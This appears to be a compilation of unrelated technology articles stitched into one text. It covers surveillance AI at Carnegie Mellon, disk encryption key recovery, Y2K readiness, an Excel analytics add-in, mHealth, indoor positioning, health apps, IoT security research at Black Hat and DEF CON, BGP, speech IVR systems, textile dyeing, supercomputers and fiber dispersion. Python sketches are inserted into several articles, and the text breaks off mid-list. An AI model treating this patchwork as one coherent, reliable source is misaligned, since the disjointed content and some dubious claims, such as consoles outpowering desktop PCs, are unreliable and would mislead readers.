Security guards who monitor surveillance cameras could one day be replaced by a computer program, thanks to the Mind's Eye program at Carnegie Mellon University (CMU). At CMU, researchers are working on software that can not only monitor surveillance video but also predict what will happen next and prevent crimes before they occur, Phys.org reported. The system would sound an alarm upon detecting behavior it considers suspicious. Details about the project, which is funded by the U.S. Army, were published this week in a paper called "Using Ontologies in a Cognitive-Grounded System: Automatic Action Recognition in Video Surveillance" [PDF]. Alessandro Oltramari, a postdoctoral researcher, and Christian Lebiere, both from the Department of Psychology at CMU, suggested that the system could be used in both military and civil environments. The system's cognitive engine identifies actions such as walk, run, carry, follow, pick up and chase, and micro-actions such as bend over, drag and stop. In addition to identifying what people are doing, the cognitive engine is also able to couple visual signals with background knowledge to draw conclusions. For instance, the algorithm "knows" that cars move, every car needs a driver to move, drivers are people located inside of cars, and if a car moves then the driver inside the car moves along with it. The system can understand things that may sound obvious to people but can be troublesome for computers. Researchers said they plan to extend the functionality of the software to include more verbs and to run tests on a larger video data set.
Full disk encryption software uses a symmetric encryption algorithm to encrypt every block on a hard disk or other persistent storage media (e.g., flash drives). The idea is that even if the storage device is lost or stolen, none of the contents of the filesystem will be compromised. A key consideration with full disk encryption is generating and securing the encryption key. Normally a single, long, pseudo-random encryption key is used to encrypt the storage device. User keys are used to encrypt and decrypt this disk encryption key. User keys, in turn, may take several forms. The most common approach to key management on personal computers (i.e., not servers, where system startup typically must proceed unattended) is to prompt the user to enter a password prior to starting the PC's operating system. The password decrypts the user's key, which in turn decrypts the data key that encrypts/decrypts the hard drive contents. Where pre-boot password authentication is used, the pre-boot password may be synchronized with the user's primary network login password -- usually an Active Directory password. This reduces the number of distinct passwords users must remember and type. If a user forgets his pre-boot password, he must go through an unlock process. Typically the full disk encryption software presents the user with a challenge string, which the user communicates to an IT support person with access to a key recovery application. The support person enters the challenge string and reads back a response, which the user must type. A correct response will unlock the user's PC, at which time the user should choose a new password (and remember it this time!). Hitachi ID Password Manager enables users whose PCs are protected with disk encryption software, and who have forgotten the password they type to unlock their computer, to reactivate their PCs through a key recovery process.
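The two-level key scheme described above (a disk-wide data key wrapped by a password-derived user key) can be sketched with Python's standard library. Everything here is illustrative: the XOR-based wrap, the iteration count, and the passwords are not how any particular product works, and real disk encryption uses vetted constructions such as AES key wrap rather than an XOR pad.

```python
import hashlib
import os

def derive_user_key(password, salt, length=32):
    """Derive a user key from the pre-boot password via PBKDF2-HMAC-SHA256."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000,
                               dklen=length)

def xor_bytes(a, b):
    """Toy 'wrap' operation; stands in for a real key-wrap algorithm."""
    return bytes(x ^ y for x, y in zip(a, b))

# One long pseudo-random data key encrypts the whole disk; only the small
# wrapped copy of it depends on the user's password.
salt = os.urandom(16)
data_key = os.urandom(32)
wrapped = xor_bytes(data_key, derive_user_key("correct horse", salt))

# Changing the password re-wraps the data key; the disk itself is untouched.
rewrapped = xor_bytes(data_key, derive_user_key("new password", salt))
```

This is why a password change (or a help-desk reset) is cheap: only the few dozen wrapped bytes are rewritten, never the encrypted blocks themselves.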
Many electronic systems rely upon computer codes or embedded microprocessors that are unable to process the change in date from 1999 to 2000 -- the so-called Y2K computer problem. Industry and governments around the world have been working together for years to minimize the impact of this problem. There are four principal challenges resulting from the Y2K "millennium bug":

- Ensuring that all products are Year 2000 compliant;
- Minimizing disruption to internal information systems and processes;
- Minimizing disruption in delivery of services and assistance to publics; and
- Minimizing disruption to economic growth by limiting exposure and resources devoted to Y2K-related legal liability action.

According to the U.S. Department of Commerce, American businesses and the government have already spent over $100 billion preparing for the 2000 date change. Cisco Systems supported bipartisan efforts in Congress to encourage information disclosure and minimize frivolous lawsuits. At the same time, Cisco has taken steps to contractually address publics' needs while also presenting a viable plan to correct any problems. Advanced planning and preparation by the private and public sectors should allow for smooth management of the process.

For decades, computer programmers routinely used two digits rather than four to refer to years (i.e., 19__) to save scarce memory space. When these programs advance from 12/31/99 to 1/1/00, they may mistakenly read the year "00" as 1900 rather than 2000. This problem could result in administrative errors, machinery malfunctions or even computer crashes. Although this Year 2000 ("Y2K") problem is generally software related, it also exists in many hardware components where microprocessor chips and other integrated circuits store and process data. Cisco Systems has taken a number of actions with respect to its own Y2K readiness, which are discussed below.
In addition, Cisco supported bipartisan Congressional efforts to encourage information disclosure and minimize the incidence and impact of frivolous lawsuits. First, in 1998 Cisco endorsed the Year 2000 Information and Readiness Disclosure Act (S.2392), a bill to encourage companies to share information on Y2K by limiting liability for such disclosures. This year Cisco supported the Year 2000 Readiness and Responsibility Act (H.R. 775), a bill to encourage remediation rather than litigation of Y2K problems. Both measures were passed by Congress and signed into law. Cisco worked with its partners and associations such as the Information Technology Industry Council to encourage fair and sensible legislation. Internally, Cisco appointed an executive steering committee to oversee the company's own compliance and remediation efforts.

- American businesses and the government have spent over $100 billion preparing for the 2000 date change (U.S. Dept of Commerce Y2K Cost Report, Nov. 1999).
- Y2K spending in the U.S. and 11 European countries doubled from $256 billion in April 1998 to $494 billion by November (Cap Gemini America tracking poll, 11/1998).
- Nearly 60 percent of all available IT labor resources have been focused on Year 2000 activity (Cap Gemini America tracking poll, 11/1998).
- As of 9/1999, 56% of large corporations expected 100% of their critical systems to be compliant by year's end, up from 48% in 8/1999; 38% expected that between 76% and 99% of their systems would be compliant (Cap Gemini America tracking poll, 9/22/1999).
- It costs between $450 and $600 to fix each Y2K computer program (Gartner Group).
- Companies spent 29% of their computer budgets on Y2K in 1998; in 1999 costs are predicted to rise to 44% (Gartner Group).
- The cost of addressing Y2K issues will total between $150 and $225 billion in the US, and $300 to $600 billion worldwide (Gartner Group).

Useful Y2K Links

- President's Council on the Year 2000 Conversion
- U.S. Federal Government Gateway for Year 2000 Information Directories
- Y2K Information for Children sites, including Y2Kids.net and GSA's Y2K for Kids
- U.S. Senate Special Committee on the Year 2000 Problem
- U.S. House of Representatives Y2K Subcommittee
- U.S. Small Business Administration's Year 2000 Web Site
- U.S. Government Accounting Office Reports & Publications
- Government Executive Magazine's Year 2000 Managers' Toolbox
- International Year 2000 Conference on IT
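The two-digit-year ambiguity described at the start of this article, and the "windowing" remediation commonly applied during Y2K fixes, can be sketched in Python. The pivot value of 70 is an illustrative choice; each remediation project picked its own cut-off.

```python
def expand_two_digit_year(yy, pivot=70):
    """Windowing fix for two-digit years: values below the pivot are taken
    as 20xx, the rest as 19xx. The pivot (70 here) is a per-site choice."""
    if not 0 <= yy <= 99:
        raise ValueError("expected a two-digit year")
    return 2000 + yy if yy < pivot else 1900 + yy

# The naive interpretation that caused the bug: '00' read as 1900.
naive = 1900 + 0
fixed = expand_two_digit_year(0)
```

Windowing was popular because it changed only the interpretation of stored values; the alternative, expanding every stored date field to four digits, required modifying file formats and databases as well as code.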
Data Mining and Predictive Analytics Software For Microsoft Excel: Page 2

Data Mining and Predictive Analytics in Four Steps

The tool allows you to mine your own data to find patterns using only four steps: prepare, analyze, predict and report. It is also designed to automate the process of algorithm selection, parameter tuning and reporting. Each step is easily accessed using a separate tab in your 11Ants Model Builder Excel Ribbon.

Prepare: By selecting data columns in your spreadsheet, you choose one column as the target column and others as the input. For example, for sales data you might use season, date and volume as the input and the revenues column as the target. The 11Ants Model Builder will analyze the relationships between the input and the target. The data is then partitioned, or split, into two sets: training and test. Users familiar with Excel will have little trouble getting the data prepared. Options in Model Builder allow you to change the target column and adjust the balance between the test and training set sizes. Once you have selected your options, you click "Prepare Sheets" and you will find your Excel worksheet is now three worksheets: the original plus one each for the training data and the test data.

Analyze: As this process runs, 11Ants Model Builder analyzes the data for relationships and continuously generates models, looking for the best one. The quality score changes based on the amount and quality of data being analyzed. You can view quick info about the project, including estimated input influences, the Top 10 and the improvement curve. As the process runs, you can watch the quality score: the higher the percentage, the more patterns found in the data. This information is also available through the Manage tab in the Excel Ribbon.

Predict: When ready, you can build your predictive model using the test spreadsheet.
By selecting "Predict" from the ribbon, you can configure your prediction settings, and a new sheet will be generated to show how the model performs on the test data. Using your test data worksheet, you can choose your model, confirm your input data type, choose a column to output the results, assign a confidence (high/medium/low) to each prediction, decide the type of prediction to be reported, and compare predictions against known values. When you click "Predict Now," a new worksheet for the prediction statistics is generated.
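The train/test partitioning behind the Prepare step can be sketched in Python. The 70/30 split, the fixed seed, and the function name are illustrative choices, not 11Ants defaults.

```python
import random

def prepare_sheets(rows, test_fraction=0.3, seed=42):
    """Shuffle the rows and partition them into training and test sets,
    analogous to splitting one worksheet into two. The fraction and seed
    are illustrative parameters."""
    rng = random.Random(seed)
    shuffled = rows[:]          # leave the caller's list untouched
    rng.shuffle(shuffled)
    n_test = int(len(shuffled) * test_fraction)
    return shuffled[n_test:], shuffled[:n_test]  # (train, test)
```

Holding out a test set that the model never sees during training is what makes the later Predict step an honest check: a model scored on its own training rows would look better than it really is.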
There's an interesting report from the UN Foundation and Vodafone about mHealth, that is, applications of mobile technology to health problems in the developing world. Because mobile has grown so fast, and costs have fallen rapidly, the mobile phone has leapfrogged the land-line and the personal computer and rapidly become the most pervasive communications device in places like Africa and Latin America. Land-lines will never catch up now (because the infrastructure cost is too high), and in terms of personal computing, the phone is the first computer many Africans will see, and in many cases the only Internet-connected device. The UN report shows that there are approximately 10 times as many mobiles available as computers, so the potential effect is profound.

But mHealth is not necessarily about the Internet at all, and in fact many of the successful applications deliver value through basic voice and text functions. One example is disease tracking, where field workers can report malaria outbreaks or cholera spread using IVR or text-based applications. This allows quicker central understanding of what's happening in the population and enables a meaningful medical response.

Another example is in communication of health information. Where there are few health workers addressing the needs of a large and distributed population, it is not possible to reach everyone in person to communicate information about staying healthy. SMS texting is a useful channel for sending information out widely, without depending on people visiting clinics.

The report also talks about remote monitoring, where TB patients are given mobiles so that remote health workers can monitor their condition and also remind the patients to take their drugs.
The evidence shows that compliance of patients is greatly increased, meaning more chance that they will make a recovery, but also (importantly) pass on the disease to fewer others. A lot of the tools that we have available through phones (IVRs, USSD menus, text, voice SMS etc) look primitive compared to the kind of communication available to Internet users in the richer North of the planet, but it's easy to overlook the radical effect that simple technologies can have on the poorer communities of the World.
The Global Positioning System was developed 40 years ago this year, and it was put into full operation 20 years ago next year. Since then, many devices have incorporated GPS capabilities -- first it was dedicated electronic devices, but now just about anyone with a mobile device can use it to easily get from Point A to Point B. But what if you are already at Point B and you want to find your way around once you go inside? “Indoor GPS” is a bit of a misnomer, since it doesn’t use GPS satellites to get a position but uses other methods such as Wi-Fi signals and sensors already present in many buildings. For the past year, this feature has been almost exclusively used by Google in its Maps for Android. But Google is limited by the number of building floor plans available – so far, it has managed to accumulate 10,000 floor plans spanning 13 countries. Not a lot. But the prospects for indoor positioning could be looking up as the field of providers expands. Apple recently acquired a company called WiFiSLAM in order to provide indoor mapping. And last August, a group of companies, including Nokia, Samsung, Sony Mobile and 19 others, formed the In-Location Alliance to further develop the technology. Earlier last year, Broadcom began shipping a microchip designed to tie together a variety of positioning feeds for indoor tracking, including vertical positions. Soon, everyone with a mobile device could be able to navigate any publicly accessible building. High-security government buildings are likely to be the exception, of course. But with secure mobile device management becoming more powerful and easier to implement, perhaps a secure version of indoor GPS will allow authorized personnel to make their meetings on time while still keeping people who don't belong in the dark. Posted by Greg Crowe on Apr 01, 2013 at 9:39 AM
The best defense against severe weather is early warning, giving people time to take shelter and prepare.
And as people increasingly rely on mobile devices for communications, especially in weather emergencies when power goes out, a mobile app can be a critical communication tool. The Red Cross's Tornado App is the latest tool to keep people apprised of severe weather warnings. It even has an attention-getting audible siren that goes off when a tornado warning is issued to reduce the chance of sleeping through an actual warning. Based on data from the National Oceanic and Atmospheric Administration, the app provides warnings, updates and instructions on how to prepare an emergency kit and what to do even when cellular towers and TVs are down. It can help users contact friends and family (and includes an “I’m Safe” notification), and will also notify users when a warning has passed. It even has a gaming aspect, letting people earn badges for learning how to prepare for a tornado. In 2012, tornadoes in the United States claimed 70 lives and did an estimated $1.6 billion in damage, according to the National Weather Service. And as tornado seasons go, 2012 was a relatively quiet year, according to NOAA. The free app is available from iTunes or Google Play. Users can also call "**REDCROSS" (**73327677) for a link to the app. Posted by Greg Crowe on Mar 28, 2013 at 9:39 AM
Despite government mandates and corporate policies, many employees still smoke cigarettes. This habit costs both employees and the agencies they work for countless dollars in medical insurance and maintenance, not to mention the payout for the cigarettes themselves, which quite frankly is getting expensive. The 2010 Surgeon General’s report said that “low levels of smoke exposure, including exposures to secondhand tobacco smoke, lead to a rapid and sharp increase in dysfunction and inflammation of the lining of the blood vessels, which are implicated in heart attacks and stroke.” So the smokers are not the only ones at risk.
Many smokers want to quit, but they don’t know where to start. The National Cancer Institute wants to help. NCI has released a free smartphone app called NCI QuitPal that will help someone become smoke-free. With it you can set a quit date, financial goals and reminders to help you stay on track. It will track money saved by not buying cigarettes, keep track of packs not smoked, supply tips to help deal with cravings and give you milestones pertaining to your estimated state of health based upon how long you’ve been smoke-free. It even has a hotline to NCI’s Cancer Information Service if you have any questions. NCI QuitPal does pretty much everything for you except the most important thing – actually quitting smoking. Only you can do that. But this app will make it easier to keep track of your progress, which might be all the incentive a smoker looking to quit needs. Posted by Greg Crowe on Mar 26, 2013 at 9:39 AM
Definition: A finite number of strings that are searched for in texts. See also pattern element, string matching. Note: From Algorithms and Theory of Computation Handbook, page 11-26, Copyright © 1999 by CRC Press LLC. Appearing in the Dictionary of Computer Science, Engineering and Technology, Copyright © 2000 CRC Press LLC. If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 17 December 2004. Cite this as: Algorithms and Theory of Computation Handbook, CRC Press LLC, 1999, "pattern", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 17 December 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/pattern.html
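In code, matching such a pattern reduces to multi-string search. A minimal, naive sketch (the function name is illustrative; efficient multi-pattern matchers such as the Aho-Corasick automaton preprocess the whole string set instead):

```python
# Sketch: searching a text for a finite set of pattern strings.
# A naive per-string scan is shown for clarity; Aho-Corasick builds a
# single automaton over the whole set and scans the text once.

def find_patterns(text, patterns):
    """Return {pattern: [start offsets]} for every pattern found in text."""
    hits = {}
    for p in patterns:
        positions = []
        start = text.find(p)
        while start != -1:
            positions.append(start)
            start = text.find(p, start + 1)  # allow overlapping occurrences
        if positions:
            hits[p] = positions
    return hits

print(find_patterns("the cat sat on the mat", ["the", "at"]))
# → {'the': [0, 15], 'at': [5, 9, 20]}
```

The naive scan runs in O(|text| × Σ|patterns|) time, which is fine for small sets; the automaton-based approach brings this down to roughly O(|text| + output).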
Internet Of Things Security Reaches Tipping Point
Public safety issues bubble to the top in security flaw revelations.
It all began more than four years ago with HD Moore's groundbreaking research in embedded device security -- VoIP, DSL, SCADA, printers, videoconferencing, and switching equipment -- found exposed on the public Internet and sporting diagnostics backdoors put in place by developers. The holes could allow an attacker to read and write memory and power-cycle a device in order to steal data, sabotage the firmware, and take control of it, found Moore, chief security officer at Rapid7 and creator of Metasploit. "This feature shouldn't be enabled" in production mode but instead deactivated, he told Dark Reading in a 2010 interview on his research on the widespread vulnerability in VxWorks-based devices. Fast forward to Black Hat USA and DEF CON 22 last week in Las Vegas, where the dominant and overarching theme was the discovery of, yes, intentional backdoors, hardcoded credentials, unencrypted traffic, and critical systems lumped on the same network as noncritical functions in today's increasingly networked and automated commercial systems. And those embedded hardware weaknesses were on display by researchers who found them in cars, TSA checkpoint systems, satellite ground terminals, cell phones and networks, home automation and security systems -- and even baby monitors. Moore's 2010 findings and subsequent research should have been a major wakeup call for the Internet of Things. But instead the problem has snowballed and gone mainstream, as industries not schooled in cyber security got their first lesson in white-hat hacking in the past year when massive holes in their consumer products were discovered and publicized.
Now that these vulnerabilities, many of which require relatively simple fixes, have spilled into the arena of public and physical safety with hackable cars, pacemakers, road traffic systems, and airplanes, the tipping point for solving the security of Internet-connected things may finally have arrived. It's the public safety angle that may ultimately capture the attention of legislators and regulators -- if not the consumer product vendors themselves -- to start taking security seriously, experts say. "Everybody should be worried a lot. It's modified Linux in most cases [in these devices]" and there has been little if any improvement in its security, says Marc Maiffret, CTO at BeyondTrust. "A lot have lame vulnerabilities. Name your embedded system -- it's going to have something." Just how to get the consumer product world in sync with security research is the problem. Researchers routinely report bugs to the vendors and government-based organizations like the ICS-CERT, but they still either get ignored altogether by the vendors or in some cases face legal threats. "There's no framework for the level of accountability, no responsibility to accept [by the vendors]. The risk is passed on to the consumer," says Trey Ford, global security strategist at Rapid7. But there was a shift last week in Vegas, as the security community began pitching and proposing some next steps to fix the problem of vulnerable consumer goods. I Am The Cavalry, a grassroots organization formed to bridge the gap between researchers and the consumer products sector, last week at DEF CON published an open letter to CEOs at major automakers, calling for them to adopt a new five-star cyber safety program. The group also provided a petition via change.org for others to sign. The voluntary program includes secure software development programs, vulnerability disclosure policies, forensics information, software updates, and the segmentation and isolation of critical systems on the car's network. 
Joshua Corman, chief technology officer at Sonatype and co-founder of I Am The Cavalry, says that with lives at risk with many of these consumer products, such as cars, the time has come for a framework and action. Attacks against cars and other critical consumer things are a matter of public safety, he says. "You want to measure twice and cut once," he says of the need for baking security into such consumer products. [Yes, the ever-expanding attack surface of the Internet of Things is overwhelming. But next-gen security leaders gathered at Black Hat are up to the challenge. Read The Hyperconnected World Has Arrived.] Another group of security researchers, under the BuildItSecure.ly banner, is helping out smaller embedded device vendors with initial pro bono security testing of pre-production code for their IP cameras and other consumer devices. "We're going to have researchers looking at their pre-production hardware before getting it in [consumers'] hands," Mark Stanislav, a researcher with DuoSecurity, which is one of the founders of the group, said in an IoT session at DEF CON. So far, Belkin, DropCam, DipJar, and Zendo are among the IoT firms that have taken BuildItSecure.ly up on its offer. The hope is that some of these smaller firms may ultimately offer bug bounties to researchers who find vulnerabilities, or will end up engaging with the firms in consulting gigs, for example. BeyondTrust's Maiffret, meanwhile, says consumer product vendors should at least open up their Linux code to open source so it can be patched and updated. "There are a lot of ARM processors running Linux and they have some software apps sitting on top... a NAS or IP camera," for instance, he says. "At least open it up so Linux can manage, patch and update it." That same theme was echoed by Dan Geer in his keynote address at Black Hat last week. Geer proposed that software that's no longer updated or supported by its vendors should be transferred to the open-source community.
He also suggested that embedded devices have a finite life span. "Embedded systems, if having no remote management interface and thus out of reach, are a life form, and as the purpose of life is to end, an embedded system without a remote management interface must be so designed as to be certain to die no later than some fixed time," Geer told attendees. "Conversely, an embedded system with a remote management interface must be sufficiently self-protecting that it is capable of refusing a command." The bottom line is there's a lack of consumer product vendors taking ownership of the security of these products, Maiffret says. "We're always going to have a constant state of vulnerabilities," he says.
[Photo: Billy Rios at Black Hat USA discusses TSA checkpoint systems he found exposed on the public Internet. Photo Credit: Sarah Sawyer]
The good news is that much of the research in the more critical consumer device security -- cars, traffic control systems, for instance -- is ahead of the attackers, as far as we know, experts say. "Some of the hardware is very difficult to get," such as traffic control sensors, says Cesar Cerrudo, who last week at DEF CON provided new details on vulnerabilities he found in vehicle traffic control systems. "You can't go to the store. That's good for bad guys [in] that it's not easy. But at some point they can steal them or get them in some way." Cerrudo set up a phony company in order to buy traffic sensors from Sensys Networks for his research, he says. But even a more easily accessible smart TV or egg counter, if compromised, can wreak havoc on consumers. "Whatever is connected to the Internet or a network is a possible target," Cerrudo says. "We can put a man on the moon, but we can't make software reliable?" says Rick Howard, CSO at Palo Alto Networks. Kelly Jackson Higgins is Executive Editor at DarkReading.com.
She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...
BGP is the Internet's routing protocol: it is what makes the Internet work. BGP maintains a table of IP networks for the biggest network in the world, the Internet, and it governs core routing decisions across it. Instead of using traditional IGP (Interior Gateway Protocol) metrics, BGP relies on available paths, network policies and rule-sets to make routing decisions, which is why it is sometimes described as a reachability protocol. BGP was created to replace EGP (Exterior Gateway Protocol) and permit fully decentralized routing, removing the need for a centralized backbone such as the NSFNET.
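The path- and policy-based decision making described above can be sketched as a simple ordered attribute comparison. The sketch below is illustrative only (the Route class, prefix and AS numbers are made up); it mirrors the best-known BGP tie-breakers, but real implementations apply many more (eBGP vs. iBGP preference, IGP cost to next hop, router ID, and so on):

```python
# Sketch of simplified BGP best-path selection among candidate routes
# for the same prefix: highest local preference wins, then shortest
# AS path, then lowest MED.
from dataclasses import dataclass

@dataclass
class Route:
    prefix: str
    local_pref: int   # higher is preferred
    as_path: list     # shorter is preferred
    med: int = 0      # lower is preferred

def best_path(routes):
    """Pick the preferred route; the sort key encodes the attribute order."""
    return min(routes, key=lambda r: (-r.local_pref, len(r.as_path), r.med))

candidates = [
    Route("203.0.113.0/24", local_pref=100, as_path=[65001, 65002, 65003]),
    Route("203.0.113.0/24", local_pref=100, as_path=[65010, 65003]),
    Route("203.0.113.0/24", local_pref=90,  as_path=[65020]),
]
print(best_path(candidates).as_path)  # → [65010, 65003]
```

Note that the route through the shortest AS path overall loses: local preference, a policy knob, outranks path length, which is exactly why BGP is called a policy-based rather than metric-based protocol.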
Implementing natural language speech systems doesn't mean building computers that can converse with humans. The goal should be to build simple but useful applications. For years people who have struggled to work with mindless interactive voice response (IVR) systems have wondered when computers might become smart enough to react like conversational human beings. The answer is not very soon and possibly never, unless computer scientists can invent a machine with something resembling conscious intelligence. But that still leaves plenty of room for improvement in the IVR systems we have to work with from time to time. These systems can get a lot more sophisticated than simply pushing telephone buttons in response to voice commands and questions. Speech system developers, led by IBM, are conducting research into increasing the natural language and near-conversational capabilities of this technology. But people essentially have to stop thinking about speech technology in terms of Star Trek androids, suggested a panel of industry experts who discussed the present state of the art in natural language speech technology at AVIOS SpeechTEK 2004 in San Francisco this week. You don't need humanoid machine intelligence to build an IVR system that can help you make a travel reservation, check your stocks, manage your financial accounts, retrieve email or do any of a thousand other basic tasks, the panel agreed. Enterprises are already implementing speech systems for a wide range of purposes. The belief that using speech systems should be exactly like working with a human being "is an interesting research goal," said panelist Deborah Dahl, principal of the consulting firm Conversational Technologies, based in Norristown, Pa. "But in the meantime we need to look at how to make our systems more natural and more usable," she said. Speech system developers are going to do this by developing more sophisticated user interface design conventions that are also practical and effective, she said.
"They arent totally like working with a human being," she said, but "theyre things that people can learn easily, and theyll adapt to this in the same way that we adapt to the conventions of a Windows user interface." One of the key problems in getting machines to understand natural language, the panelists agreed, is their ability to recognize the highly varied intonations of human speech and the rhythmic prosody that give humans instant understanding of speech. While the basic technology is there for machines to react to prosodic statements, Dahl said, its still not enough for machines to react with anything resembling conversational speech. One particularly difficult problem to solve is the human tendency to use the "mixed initiative," such as when we speak a single word as if it were a question. For example, suggested panel moderator Moshe Yudkowsky, head of Chicago-based speech technology consulting firm Disaggregate, if an IVR system asked "Do you want to fly Tuesday?," a human might respond by indignantly barking "Tuesday?" The IVR system could either recognize that as an affirmative response or as an inappropriate response; both reactions are likely to arouse frustration in the human.
For decades now, the international apparel and textile industry has faced a problem that may seem too big to solve: how to reduce or eliminate water pollution that's a direct result of the production process — especially the resource-intensive dyeing process. The statistics are as familiar as they are disheartening: according to the World Health Organization, 1.1 billion people don't have access to potable water, which is the biggest single cause of illness and disease. The cotton industry produces 30 million tons of the fiber each year, and roughly 13 gallons of water are needed to dye just one pound of cotton. Indeed, of all fibers, cotton requires the most water for the dyeing process. And half of all garments produced annually are made from cotton. Despite all of the technological advances in manufacturing apparel, the cotton dyeing process hasn't changed significantly since the Industrial Revolution. Most alarming, however: pollution from textile dyeing dumps 72 toxic chemicals into waterways — 30 of which cannot be removed once they've entered the water. The continuing saga in the Indian textile production city of Tirupur, where manufacturing facilities have come to a standstill after the Noyyal River became clogged with pollution, is perhaps the most glaring example of the severity of the industry's problem. "We live in a hydrosphere where all water resources are connected," says Alexandra Cousteau, water conservationist and granddaughter of Jacques Cousteau, speaking in New York on August 7. The textile dyeing industry is responsible for 20 percent of worldwide industrial water pollution, the World Bank reports. Cousteau developed her love of oceans when she was 11 years old and exploring their vast expanses with her famous explorer grandfather, the "steward king" of aquatic environments. "When you lose those places, you lose more than a creek or a stream — you lose the opportunity to pass them on to the next generation," she explains.
A different way of doing things A new startup is hoping to disrupt the status quo and clean up the textile industry's black eye. Backed by 15 years and millions of dollars of research in a North Carolina laboratory, ColorZen pretreats cotton fibers to create a natural affinity between the fiber and dye, thereby eliminating the chemical additives currently required to force the dye to adhere. "We change the fiber on a molecular level, the part that's responsible for attracting or repelling the dye," says ColorZen co-founder Michael Hariri. The process uses 90 percent less water and 75 percent less energy than the standard cotton dyeing procedures, he adds, while achieving the same rich hues and colorfastness. ColorZen launched informally at the Continuum Show this year, following with a formal press event on August 7. Manufacturers interested in the ColorZen solution avoid additional capital expenditures; the company maintains a dyeing facility and global headquarters in China where apparel producers send their raw cotton fiber for pretreatment and dyeing. The additional time required to ship the fiber to and from the ColorZen facility is balanced out by the reduced dyeing time; the company's dye process takes just one-third of the time of the traditional process, says Hariri. Technical director Tony Leonard claims that with ColorZen's process, 97 percent of the dye chemicals bond to the fabric, creating a significantly cleaner dyebath at the end of the process. Because ColorZen doesn't rely on freshwater resources for its process, future dyeing facilities can be located virtually anywhere — even in arid regions — and could end up strategically placed near the next link in the global supply chain, says Hariri. As of now, the process works only with cotton and select other natural fibers; the company is looking into expanding the use case for cotton-synthetic blends. 
ColorZen initially aims to partner with high-end brands that have the high margins capable of absorbing the modest but additional cost of its alternative dye process. Hariri insists consumers will largely avoid paying a premium for ColorZen products — which will feature specially branded hang tags in stores — explaining that additional costs are mostly recovered during production. "We're going after certain kinds of brands first, those that have already embraced sustainability," he says. "All brands today want to be sustainable," Hariri adds. "Consumers are demanding it." Jessica Binns is a Washington, D.C.-based freelance writer specializing in business, technology and social media.
Here is a collection of highlights from this week’s news stream as reported by HPCwire. Johns Hopkins Builds Data Mining Super Machine While most supercomputing designs nowadays are focused on achieving a maximum number of FLOPS (floating point operations per second), researchers at Johns Hopkins University are designing a scientific instrument that will enable a maximum number of IOPS (I/O operations per second). This novel architecture will be better suited to analyzing the enormous amounts of data that today’s science generates. Dubbed the Data-Scope, the machine is currently being developed by a group led by computer scientist and astrophysicist Alexander Szalay of Johns Hopkins’ Institute for Data Intensive Engineering and Science. The National Science Foundation is providing funding in the form of a $2.1 million grant and Johns Hopkins is contributing nearly $1 million to the project. According to Szalay: “Computer science has drastically changed the way we do science and the science that we do, and the Data-Scope is a crucial step in this process. At this moment, the huge data sets are here, but we lack an integrated software and hardware infrastructure to analyze them. Data-Scope will bridge that gap.” Data-Scope’s design will include a combination of hard disk drives, solid state disks, and GPU computing, enabling it to handle five petabytes of data, with a sequential I/O bandwidth close to 500 gigabytes per second, and a peak performance of 600 teraflops. The machine will be adept at data mining, able to discern relationships and patterns in data leading to discoveries that would otherwise not be possible. There is already a backlog of data just waiting to be analyzed — three petabytes worth from about 20 interested research groups within Johns Hopkins. Szalay explains that without Data-Scope, the researchers would have to wait years in order to analyze the data already in existence, never mind the data that will keep accumulating in the meantime. 
Data-Scope is expected to begin operation in May 2011 and will handle a range of subject matter, including genomics, ocean circulation, turbulence, astrophysics, environmental science, and public health. Szalay underscores the importance of the project: “There really is nothing like this at any university right now. Such systems usually take many years to build up, but we are doing it much more quickly. It’s similar to what Google is doing — of course on a thousand-times-larger scale than we are. This instrument will be the best in the academic world, bar none.”
Appro Outfits LLNL with Visualization Cluster
This week Appro launched its Appro HyperPower Clusters, providing the Lawrence Livermore National Laboratory (LLNL) Computing Center with a new visualization cluster called “Edge.” The cluster is based on the Appro CPU/GPU GreenBlade System and is designed to support I/O-bound applications, such as advanced data analysis and visualization tasks. It will also be used for LLNL’s exascale software development computing projects. The system’s six racks house a total of 216 CPU nodes sporting six-core Intel Xeon processors and 208 NVIDIA Tesla GPU nodes, delivering 29 teraflops of computing power. The system’s 20 terabytes of memory provide the increased level of I/O bandwidth needed for data analysis and complex visualization projects. QDR InfiniBand fabric connects the compute and graphics nodes. According to Trent D’Hooge, a cluster integration lead at LLNL, Edge is the first data analysis cluster that has GPUs with ECC support and increased double-precision floating point performance. Becky Springmeyer, computational systems and software environment lead of the Advanced Simulation and Computing program at LLNL, explains that “post-processing tasks are heavily I/O bound, so specialized visualization servers that optimize I/O rather than CPU speed are better suited for this work, which will now be enabled through the ‘Edge’ cluster.”
Mobile phones, iPods, and Xboxes will become part of the teaching tool-kit, according to a survey of education professionals from industry body Intellect. More than 50% said pupils' personal devices will be incorporated into lessons over the next five years and used as much in school as at home. However, 60% said their schools had nowhere near enough technology, or could benefit from additional technology, while more than half said they needed more training in the use of technology. Consoles like the Xbox and PlayStation are increasingly becoming digital media hubs at home, and are far more powerful than modern desktop PCs. Phil Hemmings, chair of the Intellect Education Group, said, "Education professionals view ICT as a key teaching tool and an important way of communicating with pupils and parents. However, there is still much work to be done. Many professionals would like more training and the results of our sample indicate that further investment in technology is still required." Roger Broadie, a member of the technology in education body, added that there is currently a divide between schools that are helping pupils to learn effectively with ICT and those beginning to lag behind. Of the 277 schools polled, more than 80% said they considered technology either "essential" or "useful" for engaging with pupils.
With the exponential growth in communications, driven mainly by the wide acceptance of the Internet, people's demand for bandwidth and large data capacity has grown steadily. From a technical perspective, however, fiber attenuation, dispersion and nonlinearity can significantly limit the bit rate and the spanning distance of optical communication. With the improvement of fiber manufacturing and the invention of the EDFA (erbium-doped fiber amplifier), the war against attenuation has been won, while dispersion and nonlinearity remain the main considerations in today's high-speed optical communication systems. In this paper, we mainly explain dispersion in optical fibers and dispersion compensation, and introduce Fiberstore's dispersion compensation module solution.
Dispersion in Optical Fibers
The broadening of light pulses, called dispersion, is a critical factor limiting the quality of signal transmission over optical links. Dispersion is a consequence of the physical properties of the transmission medium. In general, there are three main types of dispersion in a fiber:
